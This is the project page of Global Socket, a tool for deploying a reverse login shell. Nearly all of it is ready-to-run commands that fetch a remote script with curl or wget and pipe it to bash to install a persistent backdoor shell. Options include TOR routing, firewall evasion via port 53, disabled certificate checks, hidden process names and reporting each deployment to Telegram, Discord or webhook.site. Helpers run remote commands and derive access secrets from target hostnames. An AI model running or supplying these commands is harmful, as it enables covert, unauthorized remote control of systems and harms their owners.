Global Socket

Connect like there is no firewall. Securely.


Project maintained by hackerschoice Hosted on GitHub Pages — Theme by mattgraham

Deploy a reverse login shell with a single command (fully automated) - and access the shell remotely - encrypted - and via TOR if you like.

This must be the quickest way to access a system – anonymous

Use either one of these three commands to install, uninstall, and access:

  • Install

    bash -c "$(curl -fsSL https://gsocket.io/y)"
  • Uninstall

    GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)"
  • Access

    S="ExampleSecretChangeMe" bash -c "$(curl -fsSL https://gsocket.io/y)"
  • Install

    bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
  • Uninstall

    GS_UNDO=1 bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
  • Access

    S="ExampleSecretChangeMe" bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"

Windows user need to manually install the binary. Contact us if you like to write a powershell deploy script.

Screenshots

Deploy on a host

Deploy-Example

Log in to the host from your workstation

Deploy-Login

Tips & Tricks

  • Ignore SSL / Certificate warnings

    GS_NOCERTCHECK=1 bash -c "$(curl -fsSLk https://gsocket.io/y)"
  • Deploy with a predefined secret

    X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/y)"
  • Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP

    curl -fsSL http://nossl.segfault.net/deploy-all.sh -o deploy-all.sh && \
    bash deploy-all.sh
    # alternative if port 443 is firewalled:
    GS_PORT=53 bash deploy-all.sh
  • Ignore SSL / Certificate warnings

    GS_NOCERTCHECK=1 bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/y)"
  • Deploy with a predefined secret

    X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
  • Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP

    wget --no-hsts http://nossl.segfault.net/deploy-all.sh && \
    bash deploy-all.sh
    # alternative if port 443 is firewalled:
    GS_PORT=53 bash deploy-all.sh

Useful environment variables:

S= Connect to a system (or use gs-netcat -s <secret> -il).
X= Set a predefined secret for the installation (X like in inXstallation).
GS_NOINST=1 Only start but without installing (will not survive a reboot).
GSOCKET_ARGS= Use additonal arguments. Most often used to force TOR in combination with S=, e.g. GSOCKET_ARGS="-T" S=<secret> bash -c "$(curl -fsSLk https://gsocket.io/y).
GS_DSTDIR= Set the installation directory. The default is to pick the most suitable automatically. Use find . -type d -writable.
GS_URL_BASE= Use URL for static binaries. An alternative base is https://github.com/hackerschoice/binary/raw/main/gsocket
GS_OSARCH= Force architecture. The default is to pick the most suitable automatically.
GS_DEBUG=1 Verbose output and other debug related settings. Often used together with GS_DEBUG=1 GS_NOSTART=1 GS_NOINST=1 bash -c "$(curl -fsSL https://gsocket.io/y)".
GS_HIDDEN_NAME= Use a custom hidden process name.
GS_HOST= Use a specific GSRN server (or your own relay). Try GS_HOST=1.2.3.4
GS_PORT= Use a specific GSRN port. Try any of 22,53,67,443,7350
GS_TG_TOKEN= Telegram Bot Key for reporting successfull deployments.
GS_TG_CHATID= Telegram Chat ID.
GS_DISCORD_KEY= Report to Discord
GS_WEBHOOK_KEY= Report to webhook.site
TMPDIR= Use a custom temporary directory. Try TMPDIR=$(pwd)

If all fails:

Download the static binary from https://github.com/hackerschoice/gsocket/releases/latest/. There also is an (unsupported) Windows binary or use qsocket.io.

# This will not survive reboot. Temporary access only.
killall gs; \
curl -fsSLk -ogs https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_linux-x86_64 \
&& chmod 755 gs \
&& S=$(./gs -g) \
&& GS_PORT=53 GSOCKET_ARGS="-liD -s $S" ./gs \
&& echo "Connect with: gs-netcat -s $S -i" \
&& rm -f gs
# This will not survive reboot. Temporary access only.
killall gs; \
wget --no-check-certificate -qOgs https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_linux-x86_64 \
&& chmod 755 gs \
&& S=$(./gs -g) \
&& GS_PORT=53 GSOCKET_ARGS="-liD -s $S" ./gs \
&& echo "Connect with: gs-netcat -s $S -i" \
&& rm -f gs

(Note: GS_PORT=53 is only needed if port 443 is firewalled).

Advanced Tips & Tricks

1. Run your own Deployment Server

This method logs each successful deployment. The 1-line command creates an ephemeral and public facing HTTPS tunnel (via Cloudflare) so that your server can be behind NAT/Firewall:

LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)"

2. Execute a remote command

# cut & paste this into your shell on your workstation or add to ~/.bashrc
gsexec() {
    set +m
    { echo "$2; kill -9 \$\$; __START";  sleep infinity;}|{ gs-netcat -s "$1"|sed -un '/__START/,$p'|tail +2; kill 0;}
    set -m
}

Then execute a remote command like this:

gsexec MySecretChangeMe "id; uname -a"

3. Managing Secrets

Remembering many secrets from many deployments is cumbersome. It is easier to remember just one MASTER-SEED and derive the SECRET from the target’s hostname. The following script generates a secure SECRET based on a single MASTER-SEED and the target’s hostname.

# cut & paste this into your shell on your workstation or add to ~/.bashrc
gssec() {
    [[ -z $GS_SEED ]] && { echo >&2 "Please type: GS_SEED=MySuperStrongMasterSeed"; return 255; }
    str="$(echo "${GS_SEED:?}$1" | sha512sum | base64 | tr -d -c a-z0-9)"
    str="${str:0:22}"
    [[ ! -t 1 ]] && { echo "${str}"; return; }
    echo "DEPLOY: X=${str}"' bash -c "$(curl -fsSL https://gsocket.io/y)"'
    echo "ACCESS: S=${str}"' bash -c "$(curl -fsSL https://gsocket.io/y)"'
    echo "ACCESS: gs-netcat -s ${str} -i"
}
# Set a Master Seed:
GS_SEED="ThisIsMySecretMasterSeed"

# Connect to 'alice.com'
gs-netcat -i -s $(gssec alice.com)
-----------------------------------------------------------------------------
# or show the commands to deploy on/access to 'alice.com'
gssec alice.com

# Output from above's command:
DEPLOY: X=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL https://gsocket.io/y)"
ACCESS: S=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL https://gsocket.io/y)"
ACCESS: gs-netcat -s 2m1zidi1zkkmxjjj0z0jlj -i

Get Involved. We are looking for volunteers to work on the website and a logo and to discuss new ideas. Join us on telegram.